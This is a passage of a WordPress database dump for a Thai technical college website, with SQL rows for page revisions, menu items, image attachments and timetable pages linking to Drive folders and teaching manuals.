url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%992560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\nแก้ไขประกาศ\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศการเปิดเรียนภาคฤดูร้อนปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1150-revision-v1', '', '', '2018-02-16 15:21:11', '2018-02-16 08:21:11', '', 1150, 'http://www.technicrayong.ac.th/1150-revision-v1/', 0, 'revision', '', 0),
(1160, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1160', 45, 'nav_menu_item', '', 0),
(1161, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานครูที่ปรึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%9b%e0%b8%a3%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1161', 47, 'nav_menu_item', '', 0),
(1162, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานปกครอง', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%ad%e0%b8%87', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1162', 48, 'nav_menu_item', '', 0),
(1163, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานแนะแนวอาชีพและการจัดหางาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%99%e0%b8%b0%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%9e%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1163', 49, 'nav_menu_item', '', 0),
(1164, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%a7%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1164', 50, 'nav_menu_item', '', 0),
(1165, 3, '2018-02-16 16:02:30', '2018-02-16 09:02:30', '', 'งานโครงการพิเศษและบริการชุมชน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b4%e0%b9%80%e0%b8%a8%e0%b8%a9%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1165', 51, 'nav_menu_item', '', 0),
(1167, 3, '2018-02-16 16:27:50', '2018-02-16 09:27:50', '<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21-300x179.jpg\" alt=\"\" width=\"1200\" height=\"716\" />\r\n\r\n<img class=\"aligncenter wp-image-1198 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-48-21.jpg\" alt=\"\" width=\"517\" height=\"96\" />\r\n\r\n<img class=\"wp-image-1197 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-41-04.jpg\" alt=\"\" width=\"822\" height=\"614\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n \r\n\r\n ', 'อัตลักษณ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c', '', '', '2018-06-19 13:54:13', '2018-06-19 06:54:13', '', 0, 'http://www.technicrayong.ac.th/?page_id=1167', 0, 'page', '', 0),
(1169, 3, '2018-02-16 16:21:04', '2018-02-16 09:21:04', '', '16-2-2561 16-17-21', '', 'inherit', 'closed', 'closed', '', '16-2-2561-16-17-21', '', '', '2018-02-16 16:21:04', '2018-02-16 09:21:04', '', 1167, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/16-2-2561-16-17-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1170, 3, '2018-02-16 16:22:18', '2018-02-16 09:22:18', ' \r\n\r\n<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21.jpg\" alt=\"\" width=\"1500\" height=\"895\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-1168 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-20-54.jpg\" alt=\"\" width=\"826\" height=\"440\" />\r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-revision-v1', '', '', '2018-02-16 16:22:18', '2018-02-16 09:22:18', '', 1167, 'http://www.technicrayong.ac.th/1167-revision-v1/', 0, 'revision', '', 0),
(1171, 3, '2018-02-16 16:23:13', '2018-02-16 09:23:13', ' \r\n\r\n<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21.jpg\" alt=\"\" width=\"900\" height=\"537\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-1168 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-20-54.jpg\" alt=\"\" width=\"826\" height=\"440\" />\r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-revision-v1', '', '', '2018-02-16 16:23:13', '2018-02-16 09:23:13', '', 1167, 'http://www.technicrayong.ac.th/1167-revision-v1/', 0, 'revision', '', 0),
(1172, 3, '2018-02-16 16:27:50', '2018-02-16 09:27:50', '<img class=\"aligncenter wp-image-1168 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-20-54.jpg\" alt=\"\" width=\"826\" height=\"440\" />\r\n\r\n \r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-revision-v1', '', '', '2018-02-16 16:27:50', '2018-02-16 09:27:50', '', 1167, 'http://www.technicrayong.ac.th/1167-revision-v1/', 0, 'revision', '', 0),
(1174, 4, '2018-02-16 18:29:59', '2018-02-16 11:29:59', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1s5ZqbV0gwdItaOdkYYP3lDPxM3v28r9D?usp=sharing\">ปีการศึกษา 2/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561\r\n\r\n \r\n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\r\nปีการศึกษา 1/2560\r\n\r\nปีการศึกษา 2/2560\r\n\r\nปีการศึกษา 1/2561\r\n\r\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%99%e0%b8%84%e0%b8%a3%e0%b8%b9', '', '', '2018-11-12 17:19:05', '2018-11-12 10:19:05', '', 0, 'http://www.technicrayong.ac.th/?page_id=1174', 0, 'page', '', 0),
(1175, 4, '2018-02-16 18:29:59', '2018-02-16 11:29:59', 'ตารางสอน 2/2560\r\n\r\n<hr />\r\n\r\nประเภทวิชาช่างอุตสาหกรรม\r\n\r\nแผนกวิชาช่างยนต์\r\n\r\nแผนกวิชาช่างกลโรงงาน\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอนครู', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-02-16 18:29:59', '2018-02-16 11:29:59', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(1176, 4, '2018-02-16 18:32:49', '2018-02-16 11:32:49', '', 'ดาวน์โหลด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%94%e0%b8%b2%e0%b8%a7%e0%b8%99%e0%b9%8c%e0%b9%82%e0%b8%ab%e0%b8%a5%e0%b8%94', '', '', '2018-02-16 18:32:49', '2018-02-16 11:32:49', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ดาวน์โหลด.png', 0, 'attachment', 'image/png', 0),
(1177, 4, '2018-02-16 18:33:23', '2018-02-16 11:33:23', '', 'images (1)', '', 'inherit', 'closed', 'closed', '', 'images-1', '', '', '2018-02-16 18:33:23', '2018-02-16 11:33:23', '', 1000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/images-1.png', 0, 'attachment', 'image/png', 0),
(1178, 4, '2018-02-16 18:38:40', '2018-02-16 11:38:40', '<h4><img class=\"wp-image-1176 alignleft\" src=\"/wp-content/uploads/2018/02/ดาวน์โหลด.png\" alt=\"\" width=\"54\" height=\"54\" />ตารางสอน</h4>\r\nตารางเรียน<!--more-->\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a><!--more-->\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-16 18:38:40', '2018-02-16 11:38:40', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1179, 4, '2018-02-16 18:40:57', '2018-02-16 11:40:57', '<h4>ตารางสอน</h4>\r\n<h4>ตารางเรียน</h4>\r\nเอกสารพัฒนาการเรียนการสอน\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\"> คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\"> คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-16 18:40:57', '2018-02-16 11:40:57', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1184, 4, '2018-02-16 18:46:00', '2018-02-16 11:46:00', '<h4>ตารางสอน</h4>\r\n<h4><a href=\"https://wp.me/P9wTWB-j2\">ตารางเรียน</a></h4>\r\nเอกสารพัฒนาการเรียนการสอน\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\"> คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\"> คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-16 18:46:00', '2018-02-16 11:46:00', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1185, 4, '2018-02-16 18:46:34', '2018-02-16 11:46:34', 'ตารางสอน 2/2560\r\n\r\n<hr />\r\n\r\nประเภทวิชาช่างอุตสาหกรรม\r\n\r\nแผนกวิชาช่างยนต์\r\n\r\nแผนกวิชาช่างกลโรงงาน\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-02-16 18:46:34', '2018-02-16 11:46:34', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(1186, 4, '2018-02-16 18:47:05', '2018-02-16 11:47:05', '<h4><a href=\"https://wp.me/P9wTWB-iW\">ตารางสอน</a></h4>\r\n<h4><a href=\"https://wp.me/P9wTWB-j2\">ตารางเรียน</a></h4>\r\nเอกสารพัฒนาการเรียนการสอน\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\"> คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\"> คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-16 18:47:05', '2018-02-16 11:47:05', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1187, 4, '2018-02-16 18:49:19', '2018-02-16 11:49:19', ' \r\n<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\nแผนกวิชาช่างยนต์\r\n\r\nแผนกวิชาช่างกลโรงงาน\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-02-16 18:49:19', '2018-02-16 11:49:19', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(1188, 4, '2018-02-16 18:49:38', '2018-02-16 11:49:38', '<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\nแผนกวิชาช่างยนต์\r\n\r\nแผนกวิชาช่างกลโรงงาน\r\n\r\nแผนกวิชาช่างเชื่อมโลหะ\r\n\r\nแผนกวิชาช่างไฟฟ้ากำลัง\r\n\r\nแผนกวิชาช่างอิเล็กทรอนิกส์\r\n\r\nแผนกวิชาช่างก่อสร้าง\r\n\r\nแผนกวิชาเครื่องมือวัดและควบคุม\r\n\r\nแผนกวิชาปิโตรเคมี\r\n\r\nแผนกวิชาเคมีอุตสาหกรรม\r\n\r\nแผนกวิชาเทคโนโลยียาง', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-02-16 18:49:38', '2018-02-16 11:49:38', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
